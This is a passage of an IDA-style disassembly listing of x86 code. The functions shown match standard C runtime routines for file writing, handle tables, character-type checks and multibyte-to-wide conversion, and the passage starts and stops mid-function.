loc_41E3B6: ; CODE XREF: sub_41E3A2+10�j
mov eax, esi
pop esi
retn
sub_41E3A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A91C
loc_41E3BA: ; CODE XREF: sub_41A91C:loc_41A96D�j
push 0Ah
call sub_41D965
push 16h
call sub_420318
pop ecx
pop ecx
push 3
call sub_41781E
; END OF FUNCTION CHUNK FOR sub_41A91C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E3D1 proc near ; CODE XREF: sub_41A9D8+95�p
; sub_41A9D8+E8�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_493F9C
push esi
push edi
jnb loc_41E565
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:493E60h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41E565
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41E422
loc_41E41B: ; CODE XREF: sub_41E3D1+177�j
xor eax, eax
jmp loc_41E579
; ---------------------------------------------------------------------------
loc_41E422: ; CODE XREF: sub_41E3D1+48�j
test al, 20h
jz short loc_41E432
push 2
push edi
push ecx
call sub_41CE78
add esp, 0Ch
loc_41E432: ; CODE XREF: sub_41E3D1+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41E501
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41E539
loc_41E452: ; CODE XREF: sub_41E3D1+F5�j
lea eax, [ebp+var_414]
loc_41E458: ; CODE XREF: sub_41E3D1+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41E48C
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41E477
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41E477: ; CODE XREF: sub_41E3D1+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41E458
loc_41E48C: ; CODE XREF: sub_41E3D1+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_49535C ; WriteFile
test eax, eax
jz short loc_41E4F6
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41E4C8
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41E452
loc_41E4C8: ; CODE XREF: sub_41E3D1+EA�j
; sub_41E3D1+12E�j
xor edi, edi
loc_41E4CA: ; CODE XREF: sub_41E3D1+150�j
; sub_41E3D1+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41E560
cmp [ebp+arg_0], edi
jz short loc_41E539
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41E52E
mov dword_4927F4, 9
mov dword_4927F8, eax
jmp loc_41E576
; ---------------------------------------------------------------------------
loc_41E4F6: ; CODE XREF: sub_41E3D1+E0�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41E4C8
; ---------------------------------------------------------------------------
loc_41E501: ; CODE XREF: sub_41E3D1+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_49535C ; WriteFile
test eax, eax
jz short loc_41E523
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41E4CA
; ---------------------------------------------------------------------------
loc_41E523: ; CODE XREF: sub_41E3D1+145�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41E4CA
; ---------------------------------------------------------------------------
loc_41E52E: ; CODE XREF: sub_41E3D1+10F�j
push [ebp+arg_0]
call sub_41C4E8
pop ecx
jmp short loc_41E576
; ---------------------------------------------------------------------------
loc_41E539: ; CODE XREF: sub_41E3D1+7B�j
; sub_41E3D1+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41E54E
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41E41B
loc_41E54E: ; CODE XREF: sub_41E3D1+16F�j
mov dword_4927F4, 1Ch
mov dword_4927F8, edi
jmp short loc_41E576
; ---------------------------------------------------------------------------
loc_41E560: ; CODE XREF: sub_41E3D1+FE�j
sub eax, [ebp+var_10]
jmp short loc_41E579
; ---------------------------------------------------------------------------
loc_41E565: ; CODE XREF: sub_41E3D1+15�j
; sub_41E3D1+37�j
and dword_4927F8, 0
mov dword_4927F4, 9
loc_41E576: ; CODE XREF: sub_41E3D1+120�j
; sub_41E3D1+166�j ...
or eax, 0FFFFFFFFh
loc_41E579: ; CODE XREF: sub_41E3D1+4C�j
; sub_41E3D1+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E3D1 endp
; =============== S U B R O U T I N E =======================================
sub_41E57E proc near ; CODE XREF: sub_41A9D8+6C�p
; sub_41C031+32�p ...
arg_0 = dword ptr 4
inc dword_4929E8
push 1000h
call sub_415CF8
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41E5A7
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41E5B8
; ---------------------------------------------------------------------------
loc_41E5A7: ; CODE XREF: sub_41E57E+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41E5B8: ; CODE XREF: sub_41E57E+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41E57E endp
; =============== S U B R O U T I N E =======================================
sub_41E5C2 proc near ; CODE XREF: sub_41A9D8+61�p
; sub_41CB5F+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_493F9C
jb short loc_41E5D1
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E5D1: ; CODE XREF: sub_41E5C2+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_493E60[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41E5C2 endp
; =============== S U B R O U T I N E =======================================
sub_41E5E8 proc near ; DATA XREF: .data:00429420�o
mov eax, dword_493E40
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41E5FC
mov eax, 200h
jmp short loc_41E602
; ---------------------------------------------------------------------------
loc_41E5FC: ; CODE XREF: sub_41E5E8+B�j
cmp eax, esi
jge short loc_41E607
mov eax, esi
loc_41E602: ; CODE XREF: sub_41E5E8+12�j
mov dword_493E40, eax
loc_41E607: ; CODE XREF: sub_41E5E8+16�j
push 4
push eax
call sub_42048A
pop ecx
mov dword_492AF0, eax
test eax, eax
pop ecx
jnz short loc_41E63B
push 4
push esi
mov dword_493E40, esi
call sub_42048A
pop ecx
mov dword_492AF0, eax
test eax, eax
pop ecx
jnz short loc_41E63B
push 1Ah
call sub_417FC6
pop ecx
loc_41E63B: ; CODE XREF: sub_41E5E8+30�j
; sub_41E5E8+49�j
xor ecx, ecx
mov eax, offset off_436200
loc_41E642: ; CODE XREF: sub_41E5E8+6E�j
mov edx, dword_492AF0
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_436480
jl short loc_41E642
xor edx, edx
mov ecx, offset dword_436210
loc_41E65F: ; CODE XREF: sub_41E5E8+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_493E60[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41E67C
test eax, eax
jnz short loc_41E67F
loc_41E67C: ; CODE XREF: sub_41E5E8+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41E67F: ; CODE XREF: sub_41E5E8+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_436270
jl short loc_41E65F
pop esi
retn
sub_41E5E8 endp
; =============== S U B R O U T I N E =======================================
sub_41E68D proc near ; DATA XREF: .data:00429834�o
; FUNCTION CHUNK AT 00420507 SIZE 00000058 BYTES
call sub_41BFBB
cmp byte_492834, 0
jz short locret_41E6A0
jmp loc_420507
; ---------------------------------------------------------------------------
locret_41E6A0: ; CODE XREF: sub_41E68D+C�j
retn
sub_41E68D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6A1 proc near ; CODE XREF: sub_41AAED+2D4�p
; sub_41AAED+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41E6AD
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E6AD: ; CODE XREF: sub_41E6A1+8�j
cmp dword_49288C, 0
jnz short loc_41E6C8
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41E6FA
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E6C8: ; CODE XREF: sub_41E6A1+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_435E38
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_49289C
call ds:dword_4953E8 ; WideCharToMultiByte
test eax, eax
jz short loc_41E6FA
cmp [ebp+arg_0], 0
jz short loc_41E707
loc_41E6FA: ; CODE XREF: sub_41E6A1+1E�j
; sub_41E6A1+51�j
mov dword_4927F4, 2Ah
or eax, 0FFFFFFFFh
loc_41E707: ; CODE XREF: sub_41E6A1+57�j
pop ebp
retn
sub_41E6A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E709 proc near ; CODE XREF: sub_41B320+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_41E72C
cmp [ebp+arg_8], ebx
jz short loc_41E72C
mov al, [esi]
cmp al, bl
jnz short loc_41E732
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_41E72C
mov [eax], bx
loc_41E72C: ; CODE XREF: sub_41E709+C�j
; sub_41E709+11�j ...
xor eax, eax
loc_41E72E: ; CODE XREF: sub_41E709+42�j
; sub_41E709+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E732: ; CODE XREF: sub_41E709+17�j
cmp dword_49288C, ebx
jnz short loc_41E74D
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_41E748
movzx ax, al
mov [ecx], ax
loc_41E748: ; CODE XREF: sub_41E709+36�j
; sub_41E709+C0�j
push 1
pop eax
jmp short loc_41E72E
; ---------------------------------------------------------------------------
loc_41E74D: ; CODE XREF: sub_41E709+2F�j
mov ecx, off_435C2C
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E7AA
mov eax, dword_435E38
cmp eax, 1
jle short loc_41E791
cmp [ebp+arg_8], eax
jl short loc_41E79B
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_49289C
call ds:dword_4953EC ; MultiByteToWideChar
test eax, eax
mov eax, dword_435E38
jnz short loc_41E72E
loc_41E791: ; CODE XREF: sub_41E709+5C�j
cmp [ebp+arg_8], eax
jb short loc_41E79B
cmp [esi+1], bl
jnz short loc_41E72E
loc_41E79B: ; CODE XREF: sub_41E709+61�j
; sub_41E709+8B�j ...
mov dword_4927F4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41E72E
; ---------------------------------------------------------------------------
loc_41E7AA: ; CODE XREF: sub_41E709+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_49289C
call ds:dword_4953EC ; MultiByteToWideChar
test eax, eax
jnz loc_41E748
jmp short loc_41E79B
sub_41E709 endp
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E7EB
push 103h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E7EB: ; CODE XREF: .text:0041E7D8�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov ax, [ecx+eax*2]
and eax, 103h
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E816
push 1
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E816: ; CODE XREF: .text:0041E806�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 1
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E83E
push 2
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E83E: ; CODE XREF: .text:0041E82E�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 2
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E866
push 4
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E866: ; CODE XREF: .text:0041E856�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E891
push 80h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E891: ; CODE XREF: .text:0041E87E�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 80h
retn
; =============== S U B R O U T I N E =======================================
sub_41E8A4 proc near ; CODE XREF: sub_41B320+76�p
; sub_41B320+88�p ...
arg_0 = dword ptr 4
cmp dword_435E38, 1
jle short loc_41E8BB
push 8
push [esp+4+arg_0]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E8BB: ; CODE XREF: sub_41E8A4+7�j
mov eax, [esp+arg_0]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41E8A4 endp
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E8E3
push 10h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E8E3: ; CODE XREF: .text:0041E8D3�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 10h
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E90E
push 107h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E90E: ; CODE XREF: .text:0041E8FB�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov ax, [ecx+eax*2]
and eax, 107h
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E93C
push 157h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E93C: ; CODE XREF: .text:0041E929�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov ax, [ecx+eax*2]
and eax, 157h
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E96A
push 117h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E96A: ; CODE XREF: .text:0041E957�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov ax, [ecx+eax*2]
and eax, 117h
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E995
push 20h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E995: ; CODE XREF: .text:0041E985�j
mov eax, [esp+4]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 20h
retn
; ---------------------------------------------------------------------------
cmp dword ptr [esp+4], 80h
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
mov eax, [esp+4]
and eax, 7Fh
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41E9D6
push 103h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41E9E8
; ---------------------------------------------------------------------------
loc_41E9D6: ; CODE XREF: .text:0041E9C2�j
mov eax, off_435C2C
mov ecx, [esp+4]
mov ax, [eax+ecx*2]
and eax, 103h
loc_41E9E8: ; CODE XREF: .text:0041E9D4�j
test eax, eax
jnz short loc_41E9F4
cmp dword ptr [esp+4], 5Fh
jz short loc_41E9F4
retn
; ---------------------------------------------------------------------------
loc_41E9F4: ; CODE XREF: .text:0041E9EA�j
; .text:0041E9F1�j
push 1
pop eax
retn
; ---------------------------------------------------------------------------
cmp dword_435E38, 1
jle short loc_41EA13
push 107h
push dword ptr [esp+8]
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41EA25
; ---------------------------------------------------------------------------
loc_41EA13: ; CODE XREF: .text:0041E9FF�j
mov eax, off_435C2C
mov ecx, [esp+4]
mov ax, [eax+ecx*2]
and eax, 107h
loc_41EA25: ; CODE XREF: .text:0041EA11�j
test eax, eax
jnz short loc_41EA31
cmp dword ptr [esp+4], 5Fh
jz short loc_41EA31
retn
; ---------------------------------------------------------------------------
loc_41EA31: ; CODE XREF: .text:0041EA27�j
; .text:0041EA2E�j
push 1
pop eax
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EA40 proc near ; CODE XREF: sub_41B320+797�p
; sub_41B320+7E7�p
cmp cl, 40h
jnb short loc_41EA5A
cmp cl, 20h
jnb short loc_41EA50
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_41EA50: ; CODE XREF: sub_41EA40+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_41EA5A: ; CODE XREF: sub_41EA40+3�j
xor eax, eax
xor edx, edx
retn
sub_41EA40 endp
; =============== S U B R O U T I N E =======================================
sub_41EA5F proc near ; CODE XREF: sub_41BD96+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41EAAB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41EA7D
test al, 80h
jz short loc_41EAAB
test al, 2
jnz short loc_41EAAB
loc_41EA7D: ; CODE XREF: sub_41EA5F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41EA8A
push esi
call sub_41E57E
pop ecx
loc_41EA8A: ; CODE XREF: sub_41EA5F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41EA9A
cmp dword ptr [esi+4], 0
jnz short loc_41EAAB
inc eax
mov [esi], eax
loc_41EA9A: ; CODE XREF: sub_41EA5F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_41EAB1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_41EAB7
inc eax
mov [esi], eax
loc_41EAAB: ; CODE XREF: sub_41EA5F+9�j
; sub_41EA5F+18�j ...
or eax, 0FFFFFFFFh
loc_41EAAE: ; CODE XREF: sub_41EA5F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EAB1: ; CODE XREF: sub_41EA5F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_41EAB7: ; CODE XREF: sub_41EA5F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41EAAE
sub_41EA5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EACD proc near ; CODE XREF: sub_41BDD1+5E�p
; sub_41C924+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427B30
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4929EC
xor ebx, ebx
cmp eax, ebx
jnz short loc_41EB3C
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_427824
push esi
call ds:dword_495300 ; GetStringTypeW
test eax, eax
jz short loc_41EB1A
mov eax, esi
jmp short loc_41EB37
; ---------------------------------------------------------------------------
loc_41EB1A: ; CODE XREF: sub_41EACD+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4370B8
push esi
push ebx
call ds:dword_495304 ; GetStringTypeA
test eax, eax
jz loc_41EC02
push 2
pop eax
loc_41EB37: ; CODE XREF: sub_41EACD+4B�j
mov dword_4929EC, eax
loc_41EB3C: ; CODE XREF: sub_41EACD+2F�j
cmp eax, 2
jnz short loc_41EB65
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41EB4D
mov eax, dword_49288C
loc_41EB4D: ; CODE XREF: sub_41EACD+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_495304 ; GetStringTypeA
jmp loc_41EC04
; ---------------------------------------------------------------------------
loc_41EB65: ; CODE XREF: sub_41EACD+72�j
cmp eax, 1
jnz loc_41EC02
cmp [ebp+arg_10], ebx
jnz short loc_41EB7B
mov eax, dword_49289C
mov [ebp+arg_10], eax
loc_41EB7B: ; CODE XREF: sub_41EACD+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_4953EC ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41EC02
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_416880
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_415CA0
add esp, 0Ch
jmp short loc_41EBD1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41EBD1: ; CODE XREF: sub_41EACD+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41EC02
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4953EC ; MultiByteToWideChar
cmp eax, ebx
jz short loc_41EC02
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_495300 ; GetStringTypeW
jmp short loc_41EC04
; ---------------------------------------------------------------------------
loc_41EC02: ; CODE XREF: sub_41EACD+61�j
; sub_41EACD+9B�j ...
xor eax, eax
loc_41EC04: ; CODE XREF: sub_41EACD+93�j
; sub_41EACD+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41EACD endp
; =============== S U B R O U T I N E =======================================
sub_41EC16 proc near ; CODE XREF: .text:loc_41EE2C�p
; sub_41EEE4:loc_41F05C�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_493E60
loc_41EC25: ; CODE XREF: sub_41EC16+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41EC62
lea edx, [eax+100h]
loc_41EC31: ; CODE XREF: sub_41EC16+28�j
cmp eax, edx
jnb short loc_41EC51
test byte ptr [eax+4], 1
jz short loc_41EC40
add eax, 8
jmp short loc_41EC31
; ---------------------------------------------------------------------------
loc_41EC40: ; CODE XREF: sub_41EC16+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41ECA5
loc_41EC51: ; CODE XREF: sub_41EC16+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_493F60
jl short loc_41EC25
jmp short loc_41ECA5
; ---------------------------------------------------------------------------
loc_41EC62: ; CODE XREF: sub_41EC16+13�j
mov esi, 100h
push esi
call sub_415CF8
test eax, eax
pop ecx
jz short loc_41ECA5
add dword_493F9C, 20h
lea ecx, ds:493E60h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41EC88: ; CODE XREF: sub_41EC16+88�j
cmp eax, edx
jnb short loc_41ECA0
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41EC88
; ---------------------------------------------------------------------------
loc_41ECA0: ; CODE XREF: sub_41EC16+74�j
shl edi, 5
mov ebx, edi
loc_41ECA5: ; CODE XREF: sub_41EC16+39�j
; sub_41EC16+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41EC16 endp
; =============== S U B R O U T I N E =======================================
sub_41ECAB proc near ; CODE XREF: .text:0041EE51�p
; sub_41EEE4+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_493F9C
push edi
jnb short loc_41ED0B
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:493E60h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41ED0B
cmp dword_435AA4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41ED01
sub eax, 0
jz short loc_41ECF8
dec eax
jz short loc_41ECF3
dec eax
jnz short loc_41ED01
push ebx
push 0FFFFFFF4h
jmp short loc_41ECFB
; ---------------------------------------------------------------------------
loc_41ECF3: ; CODE XREF: sub_41ECAB+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41ECFB
; ---------------------------------------------------------------------------
loc_41ECF8: ; CODE XREF: sub_41ECAB+3B�j
push ebx
push 0FFFFFFF6h
loc_41ECFB: ; CODE XREF: sub_41ECAB+46�j
; sub_41ECAB+4B�j
call ds:dword_4952FC ; SetStdHandle
loc_41ED01: ; CODE XREF: sub_41ECAB+36�j
; sub_41ECAB+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41ED1F
; ---------------------------------------------------------------------------
loc_41ED0B: ; CODE XREF: sub_41ECAB+C�j
; sub_41ECAB+28�j
and dword_4927F8, 0
mov dword_4927F4, 9
or eax, 0FFFFFFFFh
loc_41ED1F: ; CODE XREF: sub_41ECAB+5E�j
pop edi
pop esi
retn
sub_41ECAB endp
; =============== S U B R O U T I N E =======================================
sub_41ED22 proc near ; CODE XREF: sub_41BE46+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_493F9C
push edi
jnb short loc_41ED85
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:493E60h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41ED85
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41ED85
cmp dword_435AA4, 1
jnz short loc_41ED7B
xor eax, eax
sub ecx, eax
jz short loc_41ED72
dec ecx
jz short loc_41ED6D
dec ecx
jnz short loc_41ED7B
push eax
push 0FFFFFFF4h
jmp short loc_41ED75
; ---------------------------------------------------------------------------
loc_41ED6D: ; CODE XREF: sub_41ED22+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41ED75
; ---------------------------------------------------------------------------
loc_41ED72: ; CODE XREF: sub_41ED22+3E�j
push eax
push 0FFFFFFF6h
loc_41ED75: ; CODE XREF: sub_41ED22+49�j
; sub_41ED22+4E�j
call ds:dword_4952FC ; SetStdHandle
loc_41ED7B: ; CODE XREF: sub_41ED22+38�j
; sub_41ED22+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41ED99
; ---------------------------------------------------------------------------
loc_41ED85: ; CODE XREF: sub_41ED22+C�j
; sub_41ED22+2A�j ...
and dword_4927F8, 0
mov dword_4927F4, 9
or eax, 0FFFFFFFFh
loc_41ED99: ; CODE XREF: sub_41ED22+61�j
pop edi
pop esi
retn
sub_41ED22 endp
; =============== S U B R O U T I N E =======================================
sub_41ED9C proc near ; CODE XREF: sub_41BE46+32�p
; sub_41BE46+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_493F9C
jnb short loc_41EDC4
mov ecx, eax
